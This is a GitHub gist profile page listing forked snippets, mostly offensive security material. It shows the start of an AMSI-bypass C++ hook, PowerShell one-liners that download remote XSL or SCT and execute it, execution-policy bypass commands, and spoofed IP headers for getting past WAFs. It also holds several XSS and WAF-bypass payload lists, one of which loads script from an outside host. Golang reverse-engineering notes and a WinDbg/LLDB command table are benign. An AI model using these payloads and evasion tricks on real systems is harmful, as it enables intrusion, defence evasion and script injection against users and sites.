Skip to content

Instantly share code, notes, and snippets.

View sharpicx's full-sized avatar
🚬

sharpicx

🚬
View GitHub Profile
@sharpicx
sharpicx / reverse-engineering-golang.md
Created August 15, 2025 13:15 — forked from 0xdevalias/reverse-engineering-golang.md
Some notes, tools, and techniques for reverse engineering Golang binaries
@sharpicx
sharpicx / AmsiContextHook.cpp
Created August 7, 2024 18:11 — forked from rxwx/AmsiContextHook.cpp
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
* For the debug build we want:
@sharpicx
sharpicx / PowerShell.txt
Created July 14, 2024 18:37 — forked from S3cur3Th1sSh1t/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
@sharpicx
sharpicx / PowershellBypass.ps1
Created July 14, 2024 18:13 — forked from adithyan-ak/PowershellBypass.ps1
Bypass the PowerShell Execution Policy Restrictions
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/
powershell.exe -ExecutionPolicy Bypass
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
Set-ExecutionPolicy Bypass -Scope Process
@sharpicx
sharpicx / WinDbg and LLDB commands.md
Created November 29, 2023 03:53 — forked from rafaelldi/WinDbg and LLDB commands.md
WinDbg and LLDB commands

Starting

Command WinDbg LLDB
Start windbg {executable} [{args}] lldb {executable} [--args]
Attach windbg -p {pid} lldb --attach-pid {pid}

Symbols and modules

Command WinDbg LLDB
(Re)load symbols lb {module-name} target symbols add {symbol-file-path}
@sharpicx
sharpicx / xss_cheatsheet.md
Created May 5, 2023 22:36 — forked from abaykan/xss_cheatsheet.md
Full List of XSS Cheatsheet 
<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
@sharpicx
sharpicx / gist:5fbad682a91f008b2d4f007ff73eb0fe
Created April 13, 2023 06:39 — forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
@sharpicx
sharpicx / bypass waf by http headers
Created April 12, 2023 21:39 — forked from wh1t3p1g/bypass waf by http headers
- X-forwarded-for
- X-remote-IP
- X-originating-IP
- x-remote-addr
waf通常会有一个不拦截任意请求的白名单ip,上面的几个头可以用来伪造ip
如:
X-Forwarded-For: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
@sharpicx
sharpicx / xss-bypass-waf
Created April 12, 2023 21:39 — forked from zetc0de/xss-bypass-waf
XSS Bypass WAF
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
@sharpicx
sharpicx / xxsfilterbypass.lst
Created April 12, 2023 21:39 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>